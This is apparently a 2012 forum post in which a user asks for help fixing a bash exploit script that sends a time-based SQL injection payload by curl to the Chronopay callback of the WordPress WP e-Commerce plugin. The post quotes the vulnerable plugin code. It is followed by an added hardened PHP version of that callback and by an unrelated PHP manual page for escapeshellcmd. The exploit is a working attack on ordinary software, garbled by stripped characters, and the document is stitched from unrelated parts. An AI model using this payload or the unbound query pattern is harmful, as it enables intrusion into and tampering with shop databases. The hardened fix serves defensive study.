Post 302633473 by iiiiiiiiiii on Wednesday 2nd of May 2012 08:38:12 AM
Syntax error near unexpected token `('

What do I do here?

Code:
#!/bin/bash
payload=-1 AND 1=IF(21,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#
hash=`echo -n $payload  md5sum  tr -d 'n'  sed 'ss-sg'  md5sum  tr -d 'n'  sed 'ss-sg'`
curl --data cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill httpwww.[redacted].comchronopay_callback=true
 
---------------
Vulnerable code
---------------
./wp-e-commerce/wp-shopping-cart.php
 
    class WP_eCommerce {
 
        function WP_eCommerce() {
            add_action( 'plugins_loaded', array( $this, 'init' ), 8 );
        }
 
        function init() {
            ...
            $this->load();
            ...
        }
        function load() {
            ...
            wpsc_core_load_gateways();
            ...
        }
    ...
    $wpec = new WP_eCommerce();
 
 
./wp-e-commerce/wpsc-core/wpsc-functions.php
 
    function wpsc_core_load_gateways() {
        global $nzshpcrt_gateways, $num, $wpsc_gateways,$gateway_checkout_form_fields;
 
        $gateway_directory      = WPSC_FILE_PATH . '/wpsc-merchants';
        $nzshpcrt_merchant_list = wpsc_list_dir( $gateway_directory );
 
        $num = 0;
        foreach ( $nzshpcrt_merchant_list as $nzshpcrt_merchant ) {
            if ( stristr( $nzshpcrt_merchant, '.php' ) ) {
                require( WPSC_FILE_PATH . '/wpsc-merchants/' . $nzshpcrt_merchant );
            }
 
 
./wp-e-commerce/wpsc-merchants/chronopay.php
 
    function nzshpcrt_chronopay_callback()
    {
        ...
        if(isset($_GET['chronopay_callback']) && ($_GET['chronopay_callback'] == 'true') && ($_POST['cs2'] == 'chronopay'))
        {
            $salt = get_option('chronopay_salt');
             - this is by default '' and set only if explicitly stated
               inside Store Settings->Payments->General Settings->
               Chronopay->Edit->Security Key
             - problem is that there are more popular payment gateways listed (e.g.
               Google Checkout and PayPal) and if that setting is not explicitly set
               it opens the door wide to a potential attacker
 
            $gen_hash = md5($salt . md5($_POST['cs1'] . $salt));   
             
            if($gen_hash == $_POST['cs3'])
            {
                ...
                $sessionid = trim(stripslashes($_POST['cs1']));
                $transaction_id = trim(stripslashes($_POST['transaction_id']));
                $verification_data['trans_id'] = trim(stripslashes($_POST['transaction_id']));
                $verification_data['trans_type'] = trim(stripslashes($_POST['transaction_type']));
 
                switch($verification_data['trans_type'])
                {
                    ...
                    case 'rebill':
                        $wpdb->query("UPDATE `".WPSC_TABLE_PURCHASE_LOGS."` SET
                                            `processed` = '2',
                                            `transactid` = '".$transaction_id."',
                                            `date` = '".time()."'
                                        WHERE `sessionid` = ".$sessionid." LIMIT 1");
    ...
    add_action('init', 'nzshpcrt_chronopay_callback');


# 1337day.com [2011-09-13]

---------- Post updated at 07:38 AM ---------- Previous update was at 03:50 AM ----------

Anyone?
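
A hardened form of the callback check quoted in the post, as an added example that is not part of the original post or the plugin's code. The function names are hypothetical, and it assumes session ids are decimal digit strings; it rejects callbacks when no security key is configured, compares the hash with `hash_equals()`, and binds every value through `$wpdb->prepare()`.

```php
<?php
// Added example, not plugin code. Function names are hypothetical.

// Returns the validated fields, or null when the callback must be rejected.
function chronopay_verify_callback(array $post, string $salt): ?array
{
    // With the default empty security key the hash is computable by any
    // sender, so an unconfigured gateway has to reject every callback.
    if ($salt === '') {
        return null;
    }
    foreach (['cs1', 'cs3', 'transaction_id'] as $key) {
        if (!isset($post[$key]) || !is_string($post[$key])) {
            return null;
        }
    }
    $expected = md5($salt . md5($post['cs1'] . $salt));
    // hash_equals() is type-strict and constant-time, unlike ==.
    if (!hash_equals($expected, $post['cs3'])) {
        return null;
    }
    // Assumption: session ids are decimal digit strings.
    $sessionid = trim($post['cs1']);
    if (!ctype_digit($sessionid)) {
        return null;
    }
    return [
        'sessionid'      => $sessionid,
        'transaction_id' => trim($post['transaction_id']),
    ];
}

// Runs inside WordPress only: every value is bound through $wpdb->prepare().
function chronopay_mark_rebill($wpdb, array $v)
{
    $sql = "UPDATE `" . WPSC_TABLE_PURCHASE_LOGS . "` SET `processed` = '2',"
         . " `transactid` = %s, `date` = %d WHERE `sessionid` = %s LIMIT 1";
    return $wpdb->query($wpdb->prepare($sql, $v['transaction_id'], time(), $v['sessionid']));
}

// Constructed sample input exercising the three outcomes.
$salt = 'constructed-test-key';
$good = ['cs1' => '1234567890', 'transaction_id' => 'T-1'];
$good['cs3'] = md5($salt . md5($good['cs1'] . $salt));
var_dump(chronopay_verify_callback($good, $salt) !== null); // valid callback
var_dump(chronopay_verify_callback($good, '') === null);    // no key configured
$bad = ['cs1' => '12ab', 'transaction_id' => 'T-2'];
$bad['cs3'] = md5($salt . md5($bad['cs1'] . $salt));
var_dump(chronopay_verify_callback($bad, $salt) === null);  // non-numeric session id
```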
 

ESCAPESHELLCMD(3)                                                    ESCAPESHELLCMD(3)

escapeshellcmd - Escape shell metacharacters

SYNOPSIS
string escapeshellcmd (string $command)

DESCRIPTION
escapeshellcmd(3) escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands. This function should be used to make sure that any data coming from user input is escaped before this data is passed to the exec(3) or system(3) functions, or to the backtick operator. Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.

PARAMETERS
o $command - The command that will be escaped.

RETURN VALUES
The escaped string.

EXAMPLES
Example #1 escapeshellcmd(3) example

<?php
// We allow arbitrary number of arguments intentionally here.
$command = './configure '.$_POST['configure_options'];
$escaped_command = escapeshellcmd($command);
system($escaped_command);
?>

Warning: escapeshellcmd(3) should be used on the whole command string, and it still allows the attacker to pass arbitrary number of arguments. For escaping a single argument escapeshellarg(3) should be used instead.

SEE ALSO
escapeshellarg(3), exec(3), popen(3), system(3), backtick operator.

PHP Documentation Group                                              ESCAPESHELLCMD(3)